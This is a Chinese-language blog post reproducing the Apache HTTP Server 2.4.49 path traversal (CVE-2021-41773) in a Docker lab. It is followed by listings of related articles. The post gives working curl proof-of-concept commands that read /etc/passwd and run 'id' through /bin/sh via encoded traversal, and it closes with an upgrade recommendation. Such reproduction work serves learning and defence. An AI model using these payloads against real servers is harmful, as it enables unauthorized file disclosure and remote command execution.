漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)

最新推荐文章于 2024-06-23 10:06:00 发布
最新推荐文章于 2024-06-23 10:06:00 发布
阅读量999 收藏 4
点赞数 1
文章标签: apache http 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47306547/article/details/122288804
版权
本文揭示了Apache HTTP Server 2.4.49的目录穿越漏洞,涉及易受攻击的文件读取和RCE配置。通过环境搭建与POC示例,详细展示了漏洞利用过程,并提供了修复建议,包括升级到最新安全版本或避开特定模块。
摘要由CSDN通过智能技术生成

目录

漏洞简介

漏洞复现

一. Vulnerable file read config(易受攻击的文件读取配置)

环境搭建

漏洞利用

二、Vulnerable RCE config(易受攻击的 RCE 配置)

环境搭建

 漏洞利用

 漏洞修复

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory />Require all granted</Directory> 允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令(RCE)

漏洞复现

一. Vulnerable file read config(易受攻击的文件读取配置)

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

 

漏洞利用

使用POC: curl http://IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

 

 Burp抓包

 

二、Vulnerable RCE config(易受攻击的 RCE 配置)

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令

环境搭建

docker pull blueteamsteve/cve-2021-41773:with-cgid
 
docker run -dit -p 8081:80 blueteamsteve/cve-2021-41773:with-cgid

 

 漏洞利用

curl 'IP:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

 

 Burp抓包

 漏洞修复

升级到Apache HTTP Server最新安全版本,或使用Apache HTTP Server 非 2.4.49版

源十三
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache HTTP Server SSRF漏洞CVE-2021-40438)复现
2301_76467680的博客
07-09 396
拉取环境访问页面pocGET /?Win64;x64;q=0.3,en;成功页面。
Apache HTTP Server漏洞CVE-2021-41773
weixin_44769042的博客
10-26 5701
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
漏洞复现】Rejetto HTTP File Server 远程代码执行漏洞 (CVE-2024-23692)
最新发布
凝聚力安全团队
06-23 610
Rejetto HTTP File Server 存在远程代码执行漏洞,攻击者可通过构造特殊请求执行系统命令。Rejetto HTTP File Server(Rejetto HFS)是Rejetto公司的一款 HTTP 文件服务器。Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令
Apache——CVE-2021-41773
qq_45770644的博客
10-06 3712
前言: Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。 该问题仅影响 Apache 开源 Web 服务器的 2.4.49.
Apache HTTP Server 路径穿越漏洞
qq_53008544的博客
05-01 1404
发现对 Apache HTTP 服务器 2.4.50 中的 CVE-2021-41773 的修复不足。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不会影响早期版本。
Apache HTTP Server 安全漏洞CVE-2019-0211)加固指南
乐大厨串串香飘万里
10-11 1446
安全漏洞
Apache HTTP Server 拒绝服务漏洞CVE-2022-29404)
murphysec的博客
06-08 2051
CVE-2022-29404漏洞是由于Apache HTTP Server 2.4.53 及更早版本中,对可能的输入大小没有默认限制,攻击者可以利用该漏洞造成拒绝服务。该漏洞影响范围广,漏洞等级低。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://seclists.org/oss-sec/2022/q2/183 https://httpd.apache.org/security/vulnerabilities_24.html    【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
apache httpd漏洞合集
weixin_46626737的博客
07-02 638
就是上传文件,在1.php文件名后面加一个0x0ahex值进行一个绕过,恰好有解析漏洞,将1.php%0a当做1.php执行。--#exec cmd="id" -->,直接访问,就会显示。3.Apache HTTP Server路径穿越漏洞(CVE-2021-41773CVE-2021-42013)上传文件,bp抓包修改为123.php.jpg,访问其路径,会以php格式执行漏洞版本:Apache HTTP Server 2.4.49-2.4.50。漏洞版本:通用,得看是否开启了ssi组件。
apache代码执行cve-2021-41773漏洞复现
weixin_42675091的博客
09-23 948
apache代码执行cve-2021-41773漏洞复现
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 6252
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
HTTP Server类型和版本号 漏洞修复 (nginx 服务)
qq_43893881的博客
05-06 393
备注: 漏洞扫描显示 HTTP Server类型和版本号 漏洞,原来 是 F12 network 请求 header 头部 Response Headers 中 展示 Server: nginx/1.25.3。通过nginx 主配 文件中增加配置,隐藏该信息,进行修复。打开Nginx的配置文件(通常是nginx.conf)。
Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)
zzzzz1284的博客
01-16 231
CVE-2021-42013
CVE-2021-41773Apache 文件读取&命令执行复现
Biu_Biu_Bi的博客
01-03 314
Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越目录 配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3184
ApacheHTTPServerApache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值